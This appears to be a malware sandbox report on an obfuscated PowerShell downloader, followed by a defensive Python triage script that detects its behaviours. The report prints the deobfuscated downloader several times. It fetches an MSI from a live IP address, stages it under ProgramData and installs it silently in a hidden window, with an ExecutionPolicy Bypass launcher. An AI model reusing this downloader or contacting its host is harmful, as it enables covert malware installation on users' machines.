Malicious

5be136aab88d8104b83d1e4a603ebe8d

PowerShell | MD5: 5be136aab88d8104b83d1e4a603ebe8d | Size: 37.19 KB | application/x-powershell

Characteristics

No malware configuration was found at this point.

Hash      Value
MD5       5be136aab88d8104b83d1e4a603ebe8d
SHA1      ce474e06a90a28154e2a10ca5fb25f3e2baadca0
SHA256    082c873061fdb6a9a7e94f24631b2b9aa8fcc5efa6005ccab81497c84d9002ed
SHA384    f3be54850153b426a6aae7727b48b59c7293653dbe5f1799090f120729364dde8dfac41c4541f3edb05efc542f80cb2c
SHA512    33cb15bf01f66d937d5a7096904b2f609b006d518ac1c45ae5b121515a1f24de854ff83ada4559eb3ac54bca8c85fe575824050819f87a41e4a7341fc8c3f6f6
SSDeep    384:sVe7EEZbOFAmHeeR/CWimKFVrX1BUg+KOcdezeIQ4r2VPbpDS+KNcgUMPUW06jwf:L72AGhdinLXIgLOctS+jpDSTcG8W18
TLSH      1DF2323966D7E84293A43E04C4A6F85965A423B157FBCC5CF3CC9BBDB081E611B542EC
File Structure

5be136aab88d8104b83d1e4a603ebe8d  (Malicious)
  [PowerShell Command]  (Malicious)
  [Deobfuscated PS]  (Malicious)
  [Deobfuscated PS]  (Malicious)
  [Base64-Block]  (Malicious)
  [Deobfuscated PS]  (Malicious)
  [Deobfuscated PS]  (Malicious)
  [Deobfuscated PS]  (Malicious)
Artefacts

The four script artefacts are the same downloader recovered at successive deobfuscation depths; they differ only in how the msiexec argument list is quoted. The [PowerShell Command] fragment is the launcher argument list that executes a temporary script file with -NoProfile -ExecutionPolicy Bypass. Note the obfuscation style throughout: member and static method names are written as string literals ($client."GetAsync"(...), [Path]::"GetFileName"(...)), which PowerShell accepts as equivalent to the plain form.

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: 5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block]
Value:

    $ErrorActionPreference = "Stop"
    $url = "http://85.11.161.198:9191/YRJKHYWK.msi"
    $workDir = "C:\ProgramData\Zooms"
    $fileName = [Path]::"GetFileName"($url)
    $filePath = Join-Path $workDir $fileName
    New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null
    Add-Type -AssemblyName "System.Net.Http"
    $client = New-Object "System.Net.Http.HttpClient"
    $client."Timeout" = [TimeSpan]::"FromMinutes"(30)
    $response = $client."GetAsync"($url)."Result"
    $response."EnsureSuccessStatusCode"()
    $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result"
    [File]::"WriteAllBytes"($filePath, $bytes)
    $client."Dispose"()
    if ($filePath -like "*.msi") {
        Start-Process "msiexec.exe" -ArgumentList "/i "$filePath" /qn /norestart" -Wait -WindowStyle "Hidden"
    } else {
        Start-Process -FilePath $filePath -WindowStyle "Hidden"
    }

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: 5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [PowerShell Command]
Value:

    -argumentlist "-NoProfile -ExecutionPolicy Bypass -File "$tempScript"" exit

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: 5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block] > [Deobfuscated PS]
Value:

    $ErrorActionPreference = "Stop"
    $url = "http://85.11.161.198:9191/YRJKHYWK.msi"
    $workDir = "C:\ProgramData\Zooms"
    $fileName = [Path]::"GetFileName"($url)
    $filePath = Join-Path $workDir $fileName
    New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null
    Add-Type -AssemblyName "System.Net.Http"
    $client = New-Object "System.Net.Http.HttpClient"
    $client."Timeout" = [TimeSpan]::"FromMinutes"(30)
    $response = $client."GetAsync"($url)."Result"
    $response."EnsureSuccessStatusCode"()
    $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result"
    [File]::"WriteAllBytes"($filePath, $bytes)
    $client."Dispose"()
    if ($filePath -like "*.msi") {
        Start-Process "msiexec.exe" -ArgumentList "/i " $filePath /qn /norestart -Wait -WindowStyle "Hidden"
    } else {
        Start-Process -FilePath $filePath -WindowStyle "Hidden"
    }

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: 5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block] > [Deobfuscated PS] > [Deobfuscated PS]
Value:

    $ErrorActionPreference = "Stop"
    $url = "http://85.11.161.198:9191/YRJKHYWK.msi"
    $workDir = "C:\ProgramData\Zooms"
    $fileName = [Path]::"GetFileName"($url)
    $filePath = Join-Path $workDir $fileName
    New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null
    Add-Type -AssemblyName "System.Net.Http"
    $client = New-Object "System.Net.Http.HttpClient"
    $client."Timeout" = [TimeSpan]::"FromMinutes"(30)
    $response = $client."GetAsync"($url)."Result"
    $response."EnsureSuccessStatusCode"()
    $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result"
    [File]::"WriteAllBytes"($filePath, $bytes)
    $client."Dispose"()
    if ($filePath -like "*.msi") {
        Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden"
    } else {
        Start-Process -FilePath $filePath -WindowStyle "Hidden"
    }

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: 5be136aab88d8104b83d1e4a603ebe8d > [Base64-Block] > [Base64-Block] > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS]
Value:

    $ErrorActionPreference = "Stop"
    $url = "http://85.11.161.198:9191/YRJKHYWK.msi"
    $workDir = "C:\ProgramData\Zooms"
    $fileName = [Path]::"GetFileName"($url)
    $filePath = Join-Path $workDir $fileName
    New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null
    Add-Type -AssemblyName "System.Net.Http"
    $client = New-Object "System.Net.Http.HttpClient"
    $client."Timeout" = [TimeSpan]::"FromMinutes"(30)
    $response = $client."GetAsync"($url)."Result"
    $response."EnsureSuccessStatusCode"()
    $bytes = $response."Content"."ReadAsByteArrayAsync"()."Result"
    [File]::"WriteAllBytes"($filePath, $bytes)
    $client."Dispose"()
    if ($filePath -like "*.msi") {
        Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden"
    } else {
        Start-Process -FilePath $filePath -WindowStyle "Hidden"
    }
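The following triage helper is an added example and is not part of the sandbox report or of the malware. It takes PowerShell script-block text (for example the ScriptBlockText field of Event ID 4104 records), first undoes the string-quoted member-access trick seen in the artefacts above ($client."GetAsync"(...), [Path]::"GetFileName"(...)), which otherwise defeats plain keyword signatures such as ".GetAsync(" or "::WriteAllBytes(", and then extracts the behaviours this downloader exhibits: fetch to disk, staging under C:\ProgramData, silent msiexec install, hidden window and ExecutionPolicy bypass. The sample inputs are the report's own deobfuscated downloader and launcher fragment; the indicator names, the scoring and the threshold are the editor's own choices and not anything the sandbox implements.

```python
"""Triage helper for PowerShell script-block text.

Added example, not code from the sandbox report or the malware it describes.
Indicator names, scoring and threshold are the editor's own assumptions.
"""
import re
from dataclasses import dataclass, field

# Sample inputs copied from the report's artefacts, re-broken at statement
# boundaries (the report renders each script on a single line).
SAMPLE_DOWNLOADER = r'''$ErrorActionPreference = "Stop"
$url = "http://85.11.161.198:9191/YRJKHYWK.msi"
$workDir = "C:\ProgramData\Zooms"
$fileName = [Path]::"GetFileName"($url)
$filePath = Join-Path $workDir $fileName
New-Item -ItemType "Directory" -Path $workDir -Force | Out-Null
Add-Type -AssemblyName "System.Net.Http"
$client = New-Object "System.Net.Http.HttpClient"
$client."Timeout" = [TimeSpan]::"FromMinutes"(30)
$response = $client."GetAsync"($url)."Result"
$response."EnsureSuccessStatusCode"()
$bytes = $response."Content"."ReadAsByteArrayAsync"()."Result"
[File]::"WriteAllBytes"($filePath, $bytes)
$client."Dispose"()
if ($filePath -like "*.msi") {
    Start-Process "msiexec.exe" -ArgumentList "/i " $filePath "/qn" "/norestart" -Wait -WindowStyle "Hidden"
} else {
    Start-Process -FilePath $filePath -WindowStyle "Hidden"
}'''

SAMPLE_LAUNCHER = r'''-argumentlist "-NoProfile -ExecutionPolicy Bypass -File "$tempScript"" exit'''

# PowerShell accepts a string literal as a member name: $o."Name"() and
# [Type]::"Name"() behave exactly like $o.Name() and [Type]::Name().
# Signatures that look for ".GetAsync(" or "::WriteAllBytes(" therefore miss
# the quoted form, so it is normalised before any keyword matching.
MEMBER_RE = re.compile(r'(\.|::)"([A-Za-z_]\w*)"')


def normalize_member_access(text: str) -> str:
    """Rewrite $o."Name" and [T]::"Name" to $o.Name and [T]::Name."""
    return MEMBER_RE.sub(r'\1\2', text)


def count_quoted_members(text: str) -> int:
    """Number of quoted member accesses in the raw text (an obfuscation signal)."""
    return len(MEMBER_RE.findall(text))


@dataclass
class Indicators:
    urls: list = field(default_factory=list)
    paths: list = field(default_factory=list)
    quoted_member_access: int = 0
    download_to_disk: bool = False
    programdata_staging: bool = False
    silent_msiexec: bool = False
    hidden_window: bool = False
    execution_policy_bypass: bool = False

    def score(self) -> int:
        """One point per behavioural flag, plus one when quoted member access is heavy."""
        flags = (self.download_to_disk, self.programdata_staging, self.silent_msiexec,
                 self.hidden_window, self.execution_policy_bypass)
        return sum(flags) + (1 if self.quoted_member_access >= 3 else 0)


def extract_indicators(script: str) -> Indicators:
    """Normalise the script, then pull out network, filesystem and execution indicators."""
    ind = Indicators(quoted_member_access=count_quoted_members(script))
    text = normalize_member_access(script)
    ind.urls = re.findall(r'https?://[^\s"\']+', text)
    ind.paths = re.findall(r'[A-Za-z]:\\[^\s"\']+', text)
    # Download-to-disk: a fetch primitive together with a write primitive.
    fetch = re.search(r'HttpClient|WebClient|DownloadFile|Invoke-WebRequest|Start-BitsTransfer', text, re.I)
    store = re.search(r'WriteAllBytes|-OutFile\b', text, re.I)
    ind.download_to_disk = bool(fetch and store)
    ind.programdata_staging = any(p.lower().startswith(r'c:\programdata') for p in ind.paths)
    # Silent install: msiexec and a /q, /qn, /qb or /quiet switch on the same line.
    ind.silent_msiexec = any(
        'msiexec' in line.lower() and re.search(r'/q(?:n|b|uiet)?\b', line, re.I)
        for line in text.splitlines())
    ind.hidden_window = bool(re.search(r'-WindowStyle\s+"?Hidden\b', text, re.I))
    ind.execution_policy_bypass = bool(
        re.search(r'-E(?:xecutionPolicy|p)\s+"?(?:Bypass|Unrestricted)\b', text, re.I))
    return ind


def triage(script: str, threshold: int = 3) -> dict:
    """Summarise one script block; 'suspicious' when the score reaches the threshold."""
    ind = extract_indicators(script)
    return {"score": ind.score(), "suspicious": ind.score() >= threshold,
            "urls": ind.urls, "paths": ind.paths, "indicators": ind}


if __name__ == "__main__":
    for name, sample in (("downloader", SAMPLE_DOWNLOADER), ("launcher", SAMPLE_LAUNCHER)):
        print(name, triage(sample))
```

Run against the report's downloader the helper recovers the payload URL and the C:\ProgramData\Zooms staging directory and sets every flag except the ExecutionPolicy one; the launcher fragment alone trips only that flag, which is why the two should be correlated by process ancestry rather than scored in isolation.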
